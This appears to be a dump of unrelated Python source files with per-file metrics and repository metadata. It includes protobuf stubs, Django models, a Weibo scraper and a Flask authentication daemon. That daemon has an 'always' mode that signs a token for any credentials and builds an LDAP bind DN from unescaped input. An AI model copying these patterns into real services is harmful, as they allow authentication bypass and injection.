'DESCRIPTOR' : _SERVEPREF,
'__module__' : 'graph_pb2'
# @@protoc_insertion_point(class_scope:graph.ServePref)
})
_sym_db.RegisterMessage(ServePref)
ServePrefs = _reflection.GeneratedProtocolMessageType('ServePrefs', (_message.Message,), {
'DESCRIPTOR' : _SERVEPREFS,
'__module__' : 'graph_pb2'
# @@protoc_insertion_point(class_scope:graph.ServePrefs)
})
_sym_db.RegisterMessage(ServePrefs)
RunTimeParams = _reflection.GeneratedProtocolMessageType('RunTimeParams', (_message.Message,), {
'InputsEntry' : _reflection.GeneratedProtocolMessageType('InputsEntry', (_message.Message,), {
'DESCRIPTOR' : _RUNTIMEPARAMS_INPUTSENTRY,
'__module__' : 'graph_pb2'
# @@protoc_insertion_point(class_scope:graph.RunTimeParams.InputsEntry)
})
,
'DESCRIPTOR' : _RUNTIMEPARAMS,
'__module__' : 'graph_pb2'
# @@protoc_insertion_point(class_scope:graph.RunTimeParams)
})
_sym_db.RegisterMessage(RunTimeParams)
_sym_db.RegisterMessage(RunTimeParams.InputsEntry)
_MATRIX.fields_by_name['data']._options = None
_RUNTIMEPARAMS_INPUTSENTRY._options = None
_SERVEGRAPH = _descriptor.ServiceDescriptor(
name='ServeGraph',
full_name='graph.ServeGraph',
file=DESCRIPTOR,
index=0,
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_start=1074,
serialized_end=1690,
methods=[
_descriptor.MethodDescriptor(
name='LoadCustomPnl',
full_name='graph.ServeGraph.LoadCustomPnl',
index=0,
containing_service=None,
input_type=_PNLPATH,
output_type=_NULLARGUMENT,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='LoadScript',
full_name='graph.ServeGraph.LoadScript',
index=1,
containing_service=None,
input_type=_SCRIPTPATH,
output_type=_SCRIPTCOMPOSITIONS,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='LoadGraphics',
full_name='graph.ServeGraph.LoadGraphics',
index=2,
containing_service=None,
input_type=_SCRIPTPATH,
output_type=_STYLEJSON,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='GetLoggableParameters',
full_name='graph.ServeGraph.GetLoggableParameters',
index=3,
containing_service=None,
input_type=_COMPONENTNAME,
output_type=_PARAMETERLIST,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='GetCompositions',
full_name='graph.ServeGraph.GetCompositions',
index=4,
containing_service=None,
input_type=_NULLARGUMENT,
output_type=_SCRIPTCOMPOSITIONS,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='GetComponents',
full_name='graph.ServeGraph.GetComponents',
index=5,
containing_service=None,
input_type=_GRAPHNAME,
output_type=_SCRIPTCOMPONENTS,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='GetJSON',
full_name='graph.ServeGraph.GetJSON',
index=6,
containing_service=None,
input_type=_GRAPHNAME,
output_type=_GRAPHJSON,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='HealthCheck',
full_name='graph.ServeGraph.HealthCheck',
index=7,
containing_service=None,
input_type=_NULLARGUMENT,
output_type=_HEALTHSTATUS,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='UpdateStylesheet',
full_name='graph.ServeGraph.UpdateStylesheet',
index=8,
containing_service=None,
input_type=_STYLEJSON,
output_type=_NULLARGUMENT,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='RunComposition',
full_name='graph.ServeGraph.RunComposition',
index=9,
containing_service=None,
input_type=_RUNTIMEPARAMS,
output_type=_ENTRY,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
])
_sym_db.RegisterServiceDescriptor(_SERVEGRAPH)
DESCRIPTOR.services_by_name['ServeGraph'] = _SERVEGRAPH
# @@protoc_insertion_point(module_scope)
| 34.34082 | 2,882 | 0.746936 | 4,157 | 35,165 | 5.984364 | 0.073851 | 0.049926 | 0.074848 | 0.074888 | 0.642481 | 0.593199 | 0.58331 | 0.581541 | 0.566346 | 0.530369 | 0 | 0.032686 | 0.127371 | 35,165 | 1,023 | 2,883 | 34.374389 | 0.77801 | 0.03367 | 0 | 0.660944 | 1 | 0.001073 | 0.178402 | 0.11064 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.005365 | 0 | 0.005365 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
7e35ba512bdc355a15686da4ebde9ef6630fcc86 | 564 | py | Python | setup.py | enricobacis/timeme | 6c906bf40daa547a8a11f034bd00b30f74519a72 | [
"MIT"
] | 1 | 2017-02-16T07:59:22.000Z | 2017-02-16T07:59:22.000Z | setup.py | enricobacis/timeme | 6c906bf40daa547a8a11f034bd00b30f74519a72 | [
"MIT"
] | null | null | null | setup.py | enricobacis/timeme | 6c906bf40daa547a8a11f034bd00b30f74519a72 | [
"MIT"
] | null | null | null | from setuptools import setup
with open('README.rst') as README:
long_description = README.read()
long_description = long_description[long_description.index('Description'):]
setup(name='timeme',
version='0.1.1',
description='Decorator that prints the running time of a function',
long_description=long_description,
url='http://github.com/enricobacis/timeme',
author='Enrico Bacis',
author_email='enrico.bacis@gmail.com',
license='MIT',
packages=['timeme'],
keywords='time timing function decorator'
)
| 31.333333 | 79 | 0.695035 | 67 | 564 | 5.746269 | 0.626866 | 0.233766 | 0.148052 | 0.233766 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006479 | 0.179078 | 564 | 17 | 80 | 33.176471 | 0.825054 | 0 | 0 | 0 | 0 | 0 | 0.342199 | 0.039007 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.066667 | 0 | 0.066667 | 0.066667 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
7e3aaf1e8600f0c4dc3c6c5d88b0c978d139ca07 | 3,272 | py | Python | billing/models/pin_models.py | litchfield/merchant | e4fba8a88a326bbde39c26e937c17d5283817320 | [
"BSD-3-Clause"
] | null | null | null | billing/models/pin_models.py | litchfield/merchant | e4fba8a88a326bbde39c26e937c17d5283817320 | [
"BSD-3-Clause"
] | null | null | null | billing/models/pin_models.py | litchfield/merchant | e4fba8a88a326bbde39c26e937c17d5283817320 | [
"BSD-3-Clause"
] | null | null | null | from django.db import models
try:
from django.contrib.auth import get_user_model
except ImportError: # django < 1.5
from django.contrib.auth.models import User
else:
User = get_user_model()
class PinCard(models.Model):
token = models.CharField(max_length=32, db_index=True, editable=False)
display_number = models.CharField(max_length=20, editable=False)
expiry_month = models.PositiveSmallIntegerField()
expiry_year = models.PositiveSmallIntegerField()
scheme = models.CharField(max_length=20, editable=False)
first_name = models.CharField(max_length=255)
last_name = models.CharField(max_length=255)
address_line1 = models.CharField(max_length=255)
address_line2 = models.CharField(max_length=255, blank=True)
address_city = models.CharField(max_length=255)
address_postcode = models.CharField(max_length=20)
address_state = models.CharField(max_length=255)
address_country = models.CharField(max_length=255)
created_at = models.DateTimeField(auto_now_add=True)
user = models.ForeignKey(User, related_name='pin_cards', blank=True, null=True)
class Meta:
app_label = 'billing'
def __unicode__(self):
return 'Card %s' % self.display_number
class PinCustomer(models.Model):
token = models.CharField(unique=True, max_length=32)
card = models.ForeignKey(PinCard, related_name='customers')
email = models.EmailField()
created_at = models.DateTimeField()
user = models.ForeignKey(User, related_name='pin_customers', blank=True, null=True)
class Meta:
app_label = 'billing'
def __unicode__(self):
return 'Customer %s' % self.email
class PinCharge(models.Model):
token = models.CharField(unique=True, max_length=32, editable=False)
card = models.ForeignKey(PinCard, related_name='charges', editable=False)
customer = models.ForeignKey(PinCustomer, related_name='customers', null=True, blank=True, editable=False)
success = models.BooleanField()
amount = models.DecimalField(max_digits=16, decimal_places=2)
currency = models.CharField(max_length=3)
description = models.CharField(max_length=255)
email = models.EmailField()
ip_address = models.GenericIPAddressField(blank=True, null=True)
created_at = models.DateTimeField()
status_message = models.CharField(max_length=255)
error_message = models.CharField(max_length=255)
user = models.ForeignKey(User, related_name='pin_charges', blank=True, null=True)
class Meta:
app_label = 'billing'
def __unicode__(self):
return 'Charge %s' % self.email
class PinRefund(models.Model):
token = models.CharField(unique=True, max_length=32)
charge = models.ForeignKey(PinCharge, related_name='refunds')
success = models.BooleanField()
amount = models.DecimalField(max_digits=16, decimal_places=2)
currency = models.CharField(max_length=3)
created_at = models.DateTimeField()
status_message = models.CharField(max_length=255)
error_message = models.CharField(max_length=255)
user = models.ForeignKey(User, related_name='pin_refunds', blank=True, null=True)
class Meta:
app_label = 'billing'
def __unicode__(self):
return 'Refund %s' % self.charge.email
| 39.421687 | 110 | 0.731357 | 409 | 3,272 | 5.643032 | 0.237164 | 0.136482 | 0.140381 | 0.187175 | 0.625217 | 0.565425 | 0.458406 | 0.391681 | 0.391681 | 0.391681 | 0 | 0.022578 | 0.160758 | 3,272 | 82 | 111 | 39.902439 | 0.817917 | 0.003667 | 0 | 0.42029 | 0 | 0 | 0.042984 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057971 | false | 0 | 0.057971 | 0.057971 | 0.898551 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
7e4e90eca537aa89aa63261527c4a76d2ff939ec | 93 | py | Python | onaws/__init__.py | bbhunter/onaws | ac5a5b7db3765258bb57cb6808f3ed04941434d2 | [
"MIT"
] | 1 | 2021-07-07T22:07:11.000Z | 2021-07-07T22:07:11.000Z | onaws/__init__.py | bbhunter/onaws | ac5a5b7db3765258bb57cb6808f3ed04941434d2 | [
"MIT"
] | null | null | null | onaws/__init__.py | bbhunter/onaws | ac5a5b7db3765258bb57cb6808f3ed04941434d2 | [
"MIT"
] | null | null | null | '''Simple library to check if a hostname belongs to AWS IP space.'''
__version__ = '0.0.12'
| 23.25 | 68 | 0.698925 | 16 | 93 | 3.8125 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.051948 | 0.172043 | 93 | 3 | 69 | 31 | 0.74026 | 0.666667 | 0 | 0 | 0 | 0 | 0.24 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
7e595646df56fa1ccc0f7430fce5f92524bd68a3 | 1,092 | py | Python | timemachines/skaters/orbt/orbitlgtskaterfactory.py | iklasky/timemachines | 1820fa9453d31d4daaeff75274a935c7455febe3 | [
"MIT"
] | 253 | 2021-01-08T17:33:30.000Z | 2022-03-21T17:32:36.000Z | timemachines/skaters/orbt/orbitlgtskaterfactory.py | iklasky/timemachines | 1820fa9453d31d4daaeff75274a935c7455febe3 | [
"MIT"
] | 65 | 2021-01-20T16:43:35.000Z | 2022-03-30T19:07:22.000Z | timemachines/skaters/orbt/orbitlgtskaterfactory.py | iklasky/timemachines | 1820fa9453d31d4daaeff75274a935c7455febe3 | [
"MIT"
] | 28 | 2021-02-04T14:58:30.000Z | 2022-01-17T04:35:17.000Z |
from timemachines.skaters.orbt.orbitinclusion import using_orbit
if using_orbit:
from timemachines.skaters.orbt.orbitwrappers import orbit_lgt_iskater
from timemachines.skatertools.utilities.conventions import Y_TYPE, A_TYPE, R_TYPE, E_TYPE, T_TYPE
from timemachines.skatertools.batch.batchskater import batch_skater_factory
def orbit_lgt_skater_factory(y: Y_TYPE, s, k: int, a: A_TYPE = None, t: T_TYPE = None, e: E_TYPE = None, r: R_TYPE = None,
emp_mass=0.0,
seasonality=None):
return batch_skater_factory(y=y, s=s, k=k, a=a, t=t, e=e, r=r, emp_mass=emp_mass,
iskater=orbit_lgt_iskater,
iskater_kwargs={'seasonality': seasonality},
min_e=0, n_warm=20)
def orbit_lgt_12(y,s,k,a=None, t=None,e=None):
return orbit_lgt_skater_factory(y=y, s=s, k=k, a=a,t=t,e=e, seasonality=12)
def orbit_lgt_24(y,s,k,a=None, t=None,e=None):
return orbit_lgt_skater_factory(y, s, k, a=a,t=t,e=e, seasonality=24)
| 45.5 | 126 | 0.638278 | 175 | 1,092 | 3.76 | 0.24 | 0.085106 | 0.085106 | 0.095745 | 0.273556 | 0.273556 | 0.238602 | 0.238602 | 0.194529 | 0.194529 | 0 | 0.015912 | 0.251832 | 1,092 | 23 | 127 | 47.478261 | 0.789474 | 0 | 0 | 0 | 0 | 0 | 0.010092 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1875 | false | 0 | 0.25 | 0.1875 | 0.625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 2 |
7e6449d6fe77effb19a71805ede2cc6094e439b0 | 347 | py | Python | project/WeiboTest/SpiderMain.py | zhengbomo/python_practice | 1bc5c4ff426f806639bbc01249e66747271ec398 | [
"MIT"
] | 2 | 2016-10-03T10:20:02.000Z | 2018-03-20T00:38:53.000Z | project/WeiboTest/SpiderMain.py | zhengbomo/python_practice | 1bc5c4ff426f806639bbc01249e66747271ec398 | [
"MIT"
] | 2 | 2019-10-08T07:13:44.000Z | 2019-10-08T07:13:46.000Z | project/WeiboTest/SpiderMain.py | zhengbomo/python_practice | 1bc5c4ff426f806639bbc01249e66747271ec398 | [
"MIT"
] | null | null | null | #!/usr/bin/python
# -*- coding:utf-8 -*-
from Spider import Spider
# 入口
spider = Spider()
fans = spider.get_my_fans()
for fan in fans:
spider.user_crawl(fan.user_id)
spider.status_crawl(fan.user_id)
followers = spider.get_my_follower()
for follower in followers:
spider.user_crawl(fan.user_id)
spider.status_crawl(fan.user_id)
| 19.277778 | 36 | 0.723343 | 55 | 347 | 4.345455 | 0.4 | 0.133891 | 0.200837 | 0.23431 | 0.41841 | 0.41841 | 0.41841 | 0.41841 | 0.41841 | 0.41841 | 0 | 0.00339 | 0.149856 | 347 | 17 | 37 | 20.411765 | 0.80678 | 0.115274 | 0 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.1 | 0 | 0.1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
7e7db118c7f4f3b7e95cfc69811f1d3a63168f03 | 381 | py | Python | backpack/extensions/secondorder/diag_ggn/permute.py | jabader97/backpack | 089daafa0d611e13901fd7ecf8a0d708ce7a5928 | [
"MIT"
] | 395 | 2019-10-04T09:37:52.000Z | 2022-03-29T18:00:56.000Z | backpack/extensions/secondorder/diag_ggn/permute.py | jabader97/backpack | 089daafa0d611e13901fd7ecf8a0d708ce7a5928 | [
"MIT"
] | 78 | 2019-10-11T18:56:43.000Z | 2022-03-23T01:49:54.000Z | backpack/extensions/secondorder/diag_ggn/permute.py | jabader97/backpack | 089daafa0d611e13901fd7ecf8a0d708ce7a5928 | [
"MIT"
] | 50 | 2019-10-03T16:31:10.000Z | 2022-03-15T19:36:14.000Z | """Module defining DiagGGNPermute."""
from backpack.core.derivatives.permute import PermuteDerivatives
from backpack.extensions.secondorder.diag_ggn.diag_ggn_base import DiagGGNBaseModule
class DiagGGNPermute(DiagGGNBaseModule):
"""DiagGGN extension of Permute."""
def __init__(self):
"""Initialize."""
super().__init__(derivatives=PermuteDerivatives())
| 31.75 | 84 | 0.76378 | 36 | 381 | 7.777778 | 0.694444 | 0.085714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125984 | 381 | 11 | 85 | 34.636364 | 0.840841 | 0.191601 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.4 | 0 | 0.8 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
7e87f76640610e9de62b60abb07ac310224902a8 | 309 | py | Python | hcap_utils/contrib/allauth/login_form.py | fabiommendes/capacidade_hospitalar | 4f675b574573eb3f51e6be8a927ea230bf2712c7 | [
"MIT"
] | null | null | null | hcap_utils/contrib/allauth/login_form.py | fabiommendes/capacidade_hospitalar | 4f675b574573eb3f51e6be8a927ea230bf2712c7 | [
"MIT"
] | 31 | 2020-04-11T13:38:17.000Z | 2021-09-22T18:51:11.000Z | hcap_utils/contrib/allauth/login_form.py | fabiommendes/capacidade_hospitalar | 4f675b574573eb3f51e6be8a927ea230bf2712c7 | [
"MIT"
] | 1 | 2020-04-08T17:04:39.000Z | 2020-04-08T17:04:39.000Z | from allauth.account.forms import LoginForm as AllauthLoginForm
class LoginForm(AllauthLoginForm):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
del self.fields["login"].widget.attrs["placeholder"]
del self.fields["password"].widget.attrs["placeholder"]
| 34.333333 | 63 | 0.702265 | 34 | 309 | 6.147059 | 0.647059 | 0.095694 | 0.124402 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.15534 | 309 | 8 | 64 | 38.625 | 0.800766 | 0 | 0 | 0 | 0 | 0 | 0.113269 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0.166667 | 0.166667 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
7e935ec5d2ebb9f636c96a59cc60b230513b416f | 3,434 | py | Python | apps/user_app/models.py | lightless233/npiss | 8338f50d971600fe2b2366836ca2fb543f2276d5 | [
"MIT"
] | 1 | 2016-11-22T13:25:02.000Z | 2016-11-22T13:25:02.000Z | apps/user_app/models.py | LiGhT1EsS/npiss | 8338f50d971600fe2b2366836ca2fb543f2276d5 | [
"MIT"
] | 4 | 2020-06-05T17:28:20.000Z | 2022-03-11T23:15:49.000Z | apps/user_app/models.py | lightless233/npiss | 8338f50d971600fe2b2366836ca2fb543f2276d5 | [
"MIT"
] | null | null | null | #!/usr/bin/env python2
# coding: utf8
from __future__ import unicode_literals
from django.db import models
from django.contrib.auth.hashers import make_password, check_password
__author__ = 'lightless'
__email__ = 'root@lightless.me'
class PissUser(models.Model):
"""
存储用户信息
"""
class Meta:
db_table = "piss_users"
username = models.CharField(max_length=64, null=False, blank=False, unique=True)
password = models.CharField(max_length=512, null=False, blank=False)
email = models.CharField(max_length=64, null=False, blank=False, unique=True)
token = models.CharField(max_length=64, unique=True, default="")
status = models.PositiveSmallIntegerField(default=9001, blank=False, null=False)
last_login_time = models.DateTimeField(default=None, null=True, blank=True)
last_login_ip = models.CharField(max_length=16, blank=True)
created_time = models.DateTimeField(auto_now_add=True)
updated_time = models.DateTimeField(auto_now=True)
is_deleted = models.BooleanField(default=False)
def save_password(self, new_password):
self.password = make_password(new_password)
def verify_password(self, input_password):
return check_password(input_password, self.password)
def get_user_status(self):
status_dict = {
9001: {"message": u"用户未激活",},
9002: {"message": u"用户正常", },
9003: {"message": u"用户被禁止登录", },
}
try:
return status_dict[self.status]
except KeyError:
return "Unknown Status"
def __str__(self):
return "<{username}, {status}>".format(username=self.username, status=self.get_user_status())
class PissActiveCode(models.Model):
"""
存储激活码信息
"""
class Meta:
db_table = "piss_active_code"
# user_id 存储哪个用户使用了这个激活码,如果没人使用,则置为0
user_id = models.BigIntegerField(null=False, blank=False, default=0)
active_code = models.CharField(max_length=64, null=False, blank=False, unique=True)
used = models.BooleanField(null=False, blank=False, default=False)
used_time = models.DateTimeField(default=None, null=True)
created_time = models.DateTimeField(auto_now_add=True)
updated_time = models.DateTimeField(auto_now=True)
is_deleted = models.BooleanField(default=False)
def get_code_status(self):
code_status = {
True: u"激活码已失效",
False: u"激活码有效",
}
return code_status[self.used]
def use_active_code(self):
self.used = True
def __str__(self):
return "<{code}-{used}>".format(code=self.active_code, used=self.used)
class PissUserExtra(models.Model):
"""
存储用户额外信息
"""
class Meta:
db_table = "piss_user_extra"
user_id = models.BigIntegerField()
access_key = models.CharField(max_length=40, blank=True)
secret_key = models.CharField(max_length=40, blank=True)
domain = models.CharField(max_length=255, blank=True)
bucket_name = models.CharField(max_length=64, blank=True)
# 如果该字段为true,则使用qiniu相关的信息和链接
# 如果该字段为False,则使用本站url,302到七牛链接
use_qiniu = models.BooleanField(default=True)
created_time = models.DateTimeField(auto_now_add=True)
updated_time = models.DateTimeField(auto_now=True)
is_deleted = models.BooleanField(default=False)
def __str__(self):
return "<{user}-{qiniu}>".format(user=self.use_id, qiniu=self.use_qiniu)
| 31.796296 | 101 | 0.689284 | 423 | 3,434 | 5.361702 | 0.27896 | 0.066138 | 0.079365 | 0.10582 | 0.387125 | 0.314815 | 0.314815 | 0.279541 | 0.246032 | 0.246032 | 0 | 0.016275 | 0.194817 | 3,434 | 107 | 102 | 32.093458 | 0.803978 | 0.043972 | 0 | 0.220588 | 0 | 0 | 0.056329 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0.088235 | 0.044118 | 0.058824 | 0.735294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 2 |
7e9894e1fe1b381787e323f05a879ce7b9f749fc | 2,478 | py | Python | nostrild/nostrild.py | nibalizer/galileo | f5d100adcfaa238d98ec2df93040eafc4d9e7420 | [
"Apache-2.0"
] | 1 | 2015-01-11T04:32:57.000Z | 2015-01-11T04:32:57.000Z | nostrild/nostrild.py | nibalizer/galileo | f5d100adcfaa238d98ec2df93040eafc4d9e7420 | [
"Apache-2.0"
] | 1 | 2015-01-12T01:17:07.000Z | 2015-01-12T01:17:07.000Z | nostrild/nostrild.py | nibalizer/galileo | f5d100adcfaa238d98ec2df93040eafc4d9e7420 | [
"Apache-2.0"
] | 2 | 2015-01-17T00:52:39.000Z | 2017-09-09T05:42:18.000Z | # nostrild
# authentication and user info daemon
import getent
import os
import yaml
import ldap
from itsdangerous import TimestampSigner
from flask import Flask, abort, request, jsonify
from flask_cors import CORS
app = Flask(__name__)
app.config['CORS_HEADERS'] = 'Content-Type'
cors = CORS(app)
def always_auth():
req = request.get_json(force=True)
if req['user'] is None:
abort(400, "You must specify a user")
if req['password'] is None:
abort(400, "You must specify a password")
secret = s.sign(req['user'])
return secret
def ldap_auth():
req = request.get_json(force=True)
if req['user'] is None:
abort(400, "You must specify a user")
if req['password'] is None:
abort(400, "You must specify a password")
con = ldap.initialize("ldap://" + conf['ldap_server'])
con.start_tls_s()
try:
dn = "uid={0},{1}".format(req['user'], conf['search_scope'])
pw = "{0}".format(req['password'])
con.simple_bind_s( dn, pw )
success = True
except:
success = False
finally:
con.unbind()
if success:
secret = s.sign(req['user'])
return secret
else:
abort(400, "Invalid username or password")
@app.route("/")
def hello():
return "nostrild: authentication for snot"
@app.route("/auth", methods = ["POST"])
def auth():
print request.json
if conf['auth_scheme'] == 'always':
secret = always_auth()
elif conf['auth_scheme'] == 'ldap':
secret = ldap_auth()
return jsonify({"secret_key": secret,
"timeout": conf['auth_timeout']})
@app.route("/user/<name>")
def username(name):
"""
return getent info and snotsig
"""
try:
passwd = dict(getent.passwd(name))
except TypeError:
abort(400, "Invalid user")
snotsig_path = '/home/{0}/solaris/.snotsig'.format(name)
sig_path = '/home/{0}/solaris/.snotsig'.format(name)
if os.path.isfile(snotsig_path):
with open(snotsig_path) as f:
snotsig = f.read()
f.closed
elif os.path.isfile(sig_path):
with open(sig_path) as f:
snotsig = f.read()
f.closed
#TODO check linux homedir as well
else:
snotsig = ""
return jsonify({"passwd": passwd, "snotsig": snotsig})
if __name__ == "__main__":
with open('config.yaml') as f:
conf = yaml.load(f.read())
f.closed
s = TimestampSigner(conf['secret_key'])
app.run(debug=True, port=conf['port'])
| 22.324324 | 64 | 0.619048 | 332 | 2,478 | 4.509036 | 0.325301 | 0.032064 | 0.029392 | 0.037408 | 0.281897 | 0.281897 | 0.281897 | 0.197729 | 0.162993 | 0.162993 | 0 | 0.012105 | 0.233253 | 2,478 | 110 | 65 | 22.527273 | 0.775789 | 0.03067 | 0 | 0.298701 | 0 | 0 | 0.198129 | 0.022109 | 0 | 0 | 0 | 0.009091 | 0 | 0 | null | null | 0.103896 | 0.090909 | null | null | 0.012987 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
7eb2e5d8b39a38645fd5ca261b5ad38bc6b3a64e | 17,580 | py | Python | deploy.py | NASA-PDS/planetarydata.org | 16731a251c22408b433117f7f01e29d004f11467 | [
"Apache-2.0"
] | null | null | null | deploy.py | NASA-PDS/planetarydata.org | 16731a251c22408b433117f7f01e29d004f11467 | [
"Apache-2.0"
] | 5 | 2021-03-19T21:41:19.000Z | 2022-02-11T14:55:14.000Z | deploy.py | NASA-PDS/planetarydata.org | 16731a251c22408b433117f7f01e29d004f11467 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# encoding: utf-8
# Copyright 2014 California Institute of Technology. ALL RIGHTS
# RESERVED. U.S. Government Sponsorship acknowledged.
#
# deploy.py - Deploy the IPDA site into operations
import argparse, sys, logging, os, os.path, re, subprocess, pwd, urllib2, contextlib, tempfile, tarfile, string, random
import shutil
reload(sys)
sys.setdefaultencoding('utf-8')
_bufsiz = 512
_buildoutCache = u'/apps/ipdasite/buildout'
_setupToolsVersion = u'23.0.0'
_virtualEnvVersion = u'15.0.2'
_buildoutVersion = u'2.5.2'
_virtualEnvURL = u'https://pypi.python.org/packages/source/v/virtualenv/virtualenv-{}.tar.gz'.format(_virtualEnvVersion)
_cHeader = '''#ifdef __cplusplus
extern "C"
#endif
'''
class DeploymentError(Exception):
pass
def _setupLogging():
logging.basicConfig(level=logging.DEBUG, format=u'%(asctime)s %(levelname)-8s %(message)s',
filename=u'deploy.log', filemode='w')
console = logging.StreamHandler()
console.setLevel(logging.INFO)
console.setFormatter(logging.Formatter(u'%(message)s'))
logging.getLogger('').addHandler(console)
logging.debug(u'Logging configured')
def _getArgParser():
p = argparse.ArgumentParser(
description=u'Deploys the IPDA web site and services in this directory. If a previous installation'
u' exists, give its path on the command-line, and its content will be migrated over. Otherwise,'
u' an empty, content-free website will be deployed.',
epilog=u'For more information or help, contact sean.kelly@jpl.nasa.gov.'
)
p.add_argument(u'existing', nargs='?', help=u'Path to existing IPDA website installation for content')
p.add_argument(u'--buildout-cache', metavar=u'PATH', default=_buildoutCache,
help=u'Use cached downloads/eggs/extends in %(metavar)s instead of %(default)s')
p.add_argument(u'--libdir', metavar=u'PATH', action='append',
help=u'Add %(metavar)s to the list of dirs to check for libraries; repeat this option as needed')
g = p.add_argument_group(u'Internet', u'Hostnames and ports.')
g.add_argument(u'--public-hostname', metavar=u'HOSTNAME',
help=u'Override the default hostname "%(default)s" with %(metavar)s', default=u'planetarydata.org')
g.add_argument(u'--http-port', metavar=u'PORTNUM', type=int, default=80,
help=u'Override the default HTTP port %(default)d with %(metavar)s')
g.add_argument(u'--https-port', metavar=u'PORTNUM', type=int, default=443,
help=u'Override the default HTTPS port %(default)d with %(metavar)s')
g = p.add_argument_group(u'Usernames & Passwords', u'Random passwords will be generated unless specified below.')
g.add_argument(u'--supervisor-user', metavar=u'USERNAME', default=u'supervisor-admin',
help=u'Override the Supervisor username "%(default)s" with %(metavar)s')
